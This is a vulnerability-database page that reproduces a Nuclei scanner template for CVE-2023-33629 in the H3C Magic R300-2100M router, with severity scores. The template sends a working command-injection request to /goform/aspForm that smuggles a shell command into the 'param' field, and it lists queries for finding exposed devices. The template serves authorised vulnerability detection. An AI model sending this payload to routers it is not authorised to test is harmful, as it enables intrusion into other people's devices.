Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-33629
HistoryOct 31, 2023 - 8:50 a.m.

H3C Magic R300-2100M - Remote Code Execution

2023-10-3108:50:53
ProjectDiscovery
github.com
5
cve2023
router
rce
h3c
stack overflow
deltriggerlist
http
vulnerability
cvss7.2

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.02 Low

EPSS

Percentile

88.9%

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
id: CVE-2023-33629

info:
  name: H3C Magic R300-2100M - Remote Code Execution
  author: DhiyaneshDK
  severity: high
  description: |
    H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33629
    - https://hackmd.io/@0dayResearch/r1UjggZfh
    - https://hackmd.io/%400dayResearch/r1UjggZfh
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33629
    cwe-id: CWE-787
    epss-score: 0.01254
    epss-percentile: 0.85534
    cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: h3c
    product: magic_r300-2100m_firmware
    fofa-query:
      - app="H3C-Ent-Router"
      - app="h3c-ent-router"
  tags: cve2023,cve,router,rce,h3c
variables:
  filename: "{{to_lower(rand_text_alpha(7))}}"

http:
  - raw:
      - |
        POST /goform/aspForm HTTP/1.1
        Host: {{Hostname}}

        CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});
      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302
          - contains(body_1, 'do_cmd.asp')
          - status_code_2 == 200
          - contains_all(body_2, 'www', 'www_multi')
        condition: and
# digest: 4a0a0047304502202ab4c628873460f2450f08b11e80f078a6d0897b010d8398a0e924934fa472ad0221008f8a015712102adee570ab25cbaa41f8b3a5b382718f672cb82b4c1c5698c6a8:922c64590222798bb761d5b6d8e72950

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.02 Low

EPSS

Percentile

88.9%

Related for NUCLEI:CVE-2023-33629